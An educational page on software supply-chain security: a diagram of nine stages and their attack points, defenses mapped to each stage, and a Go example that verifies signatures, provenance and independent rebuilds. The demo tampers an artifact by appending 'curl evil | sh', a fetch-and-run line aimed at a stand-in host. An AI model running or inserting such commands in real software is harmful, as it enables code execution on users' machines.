Software Supply Chain: Nine Stages, Nine Places to Inject
flowchart TD
    S1["1 · Developer Workstation<br/>local source code"]:::stage
    A1["⚡ compromised<br/>IDE plugin"]:::attack
    S2["2 · Source Repository · Git<br/>version control"]:::stage
    A2["⚡ stolen credentials,<br/>malicious PR"]:::attack
    S3["3 · Dependency Registry<br/>npm · PyPI · Maven"]:::stage
    A3["⚡ typosquatting;<br/>event-stream 2018"]:::attack
    S4["4 · Build Server · CI/CD<br/>source + deps to artifact"]:::stage
    A4["⚡ SolarWinds 2020"]:::attack
    S5["5 · Artifact Repository<br/>binaries / container images"]:::stage
    A5["⚡ registry account<br/>takeover"]:::attack
    S6["6 · Code Signing<br/>signature applied"]:::stage
    A6["⚡ stolen signing key"]:::attack
    S7["7 · Distribution<br/>registry · app store · CDN"]:::stage
    A7["⚡ in-transit replacement"]:::attack
    S8["8 · Deploy / Update<br/>on user infrastructure"]:::stage
    A8["⚡ malicious update;<br/>NotPetya 2017"]:::attack
    S9["9 · End User<br/>executes the code"]:::stage
    A9["⚡ skipped verification<br/>at run time"]:::attack

    S1 --> S2 --> S3 --> S4 --> S5 --> S6 --> S7 --> S8 --> S9

    S1 -.-> A1
    S2 -.-> A2
    S3 -.-> A3
    S4 -.-> A4
    S5 -.-> A5
    S6 -.-> A6
    S7 -.-> A7
    S8 -.-> A8
    S9 -.-> A9

    classDef stage fill:#1565c0,stroke:#0d47a1,stroke-width:2px,color:#fff,font-size:13px
    classDef attack fill:#ffa000,stroke:#e65100,stroke-width:2px,color:#212529,font-size:12px
    linkStyle default stroke:#90a4ae,stroke-width:2px,font-size:12px
Color Key
Supply-chain stage
⚡ Attack injection point
Stage & Incident Details
Each blue stage is a place where trusted bytes are produced or handed on; each amber ⚡ point is a way an attacker has inserted their own bytes there. Where an attack point cites a dated incident (event-stream 2018 at the dependency registry, SolarWinds 2020 at the build server, NotPetya 2017 through a software update), ask which defense below would have caught it, and at which stage the check would have had to run.
Defenses (mapped to stages)
SBOM — inventory of components, with versions and digests. Covers stages 3, 5, 9: pin exactly what is pulled from the registry, know what an artifact in the repository actually contains, and answer at run time whether a newly disclosed vulnerable component is in use. An SBOM records; it prevents nothing unless something checks it.
Code signing — applied at 6, verified at 9 (and by the updater at 8). A signature proves only that the holder of the key signed these exact bytes: it catches in-transit replacement (7) and registry tampering (5), but not a stolen key (6) or a build server that faithfully signed poisoned input (4). Verification that is skipped at 9 makes it worth nothing.
Reproducible builds — stage 4. They detect a compromised build server only when an independent party rebuilds from the same source and compares digests; a single build, however deterministic, proves nothing about itself.
Provenance attestations — stages 4–8 (SLSA). A signed statement of which builder produced the artifact, from which source, so a consumer can reject an artifact that carries a valid signature but the wrong origin.
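As an added example, not code from the original page, the consumer-side logic behind the three defenses just listed for stages 4 to 9: a signature applied at stage 6 and verified at stage 9, a SLSA-style provenance statement binding the artifact digest to its builder, and the independent-rebuild comparison that makes reproducible builds useful at stage 4. It uses only the Go standard library. The Statement fields, the Policy type, the builder URL, the commit id, the keys and the artifact bytes are this example's own constructions; the statement is a simplified stand-in for the in-toto/SLSA schema, not the real one.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"fmt"
)

// Statement is a simplified stand-in for an in-toto/SLSA provenance statement: it binds
// an artifact digest (the subject) to the builder and source that produced it. Field names are this example's own.
type Statement struct {
	SubjectName   string `json:"subject_name"`
	SubjectSHA256 string `json:"subject_sha256"`
	BuilderID     string `json:"builder_id"`
	SourceCommit  string `json:"source_commit"`
}

// SignedStatement is what stage 6 emits and stage 7 ships beside the artifact:
// the exact statement bytes plus an Ed25519 signature over them.
type SignedStatement struct {
	Payload   []byte
	Signature []byte
}

// Policy is the consumer's pinned trust (stages 8-9): which public key may attest
// on behalf of which builder. Keys arrive out of band, never with the artifact.
type Policy struct {
	Builders map[string]ed25519.PublicKey
}

func digest(b []byte) string {
	return fmt.Sprintf("%x", sha256.Sum256(b))
}

// Attest is the build/sign side (stages 4-6): hash the artifact, record who built
// it from what, and sign the serialized statement.
func Attest(priv ed25519.PrivateKey, artifact []byte, name, builderID, commit string) (SignedStatement, error) {
	st := Statement{SubjectName: name, SubjectSHA256: digest(artifact), BuilderID: builderID, SourceCommit: commit}
	payload, err := json.Marshal(st) // the signed bytes travel verbatim, so no canonicalization is needed
	if err != nil {
		return SignedStatement{}, err
	}
	return SignedStatement{Payload: payload, Signature: ed25519.Sign(priv, payload)}, nil
}

// Verify is the consumer side (stage 8 updater or stage 9 runtime) and fails closed:
// the artifact may run only if every check passes.
func (p Policy) Verify(artifact []byte, ss SignedStatement) (Statement, error) {
	var st Statement
	if err := json.Unmarshal(ss.Payload, &st); err != nil {
		return st, fmt.Errorf("malformed statement: %w", err)
	}
	// 1. Provenance: the statement must name a builder we trust, and only that builder's
	//    key may vouch for it. A laptop key, or a key stolen elsewhere, cannot claim to be our CI.
	pub, ok := p.Builders[st.BuilderID]
	if !ok {
		return st, fmt.Errorf("statement names untrusted builder %q", st.BuilderID)
	}
	// 2. Signature: applied at stage 6, verified here against the pinned key.
	if !ed25519.Verify(pub, ss.Payload, ss.Signature) {
		return st, fmt.Errorf("signature does not verify under the key pinned for %q", st.BuilderID)
	}
	// 3. Subject: the bytes received must be the bytes signed. This catches registry
	//    tampering (stage 5) and in-transit replacement (stage 7).
	if got := digest(artifact); got != st.SubjectSHA256 {
		return st, fmt.Errorf("artifact digest %s != signed subject %s", got, st.SubjectSHA256)
	}
	return st, nil
}

// CrossCheck is the reproducible-builds defense for stage 4: an independent rebuild
// of st.SourceCommit must reproduce the signed digest, or the signing builder is suspect.
func CrossCheck(st Statement, independentRebuild []byte) error {
	if got := digest(independentRebuild); got != st.SubjectSHA256 {
		return fmt.Errorf("independent rebuild %s != signed subject %s", got, st.SubjectSHA256)
	}
	return nil
}

func main() {
	// Constructed demo keys and artifact. In practice only the CI public key reaches the Policy.
	ciPub, ciPriv, _ := ed25519.GenerateKey(rand.Reader)
	_, roguePriv, _ := ed25519.GenerateKey(rand.Reader)
	builder := "https://ci.example.test/release"
	policy := Policy{Builders: map[string]ed25519.PublicKey{builder: ciPub}}
	artifact := []byte("#!/bin/sh\necho release v1.2.3\n")
	good, _ := Attest(ciPriv, artifact, "tool-1.2.3.tgz", builder, "0a1b2c3d")
	_, err := policy.Verify(artifact, good)
	fmt.Println("genuine artifact:", err)
	tampered := append(append([]byte{}, artifact...), "curl evil | sh\n"...)
	_, err = policy.Verify(tampered, good)
	fmt.Println("replaced in transit:", err)
	forged, _ := Attest(roguePriv, tampered, "tool-1.2.3.tgz", builder, "0a1b2c3d") // attacker's key, CI's name
	_, err = policy.Verify(tampered, forged)
	fmt.Println("forged provenance:", err)
}
```

Running it prints a nil error for the genuine artifact, a digest mismatch for the artifact replaced in transit, and a signature failure for the forged statement. Note what it does not do: if the release builder's own key is stolen (stage 6), the attacker's statement verifies exactly like a genuine one, and the only remaining tell is a CrossCheck rebuild that does not match; the stage 9 attack point, skipped verification, is simply never calling Verify before executing the bytes.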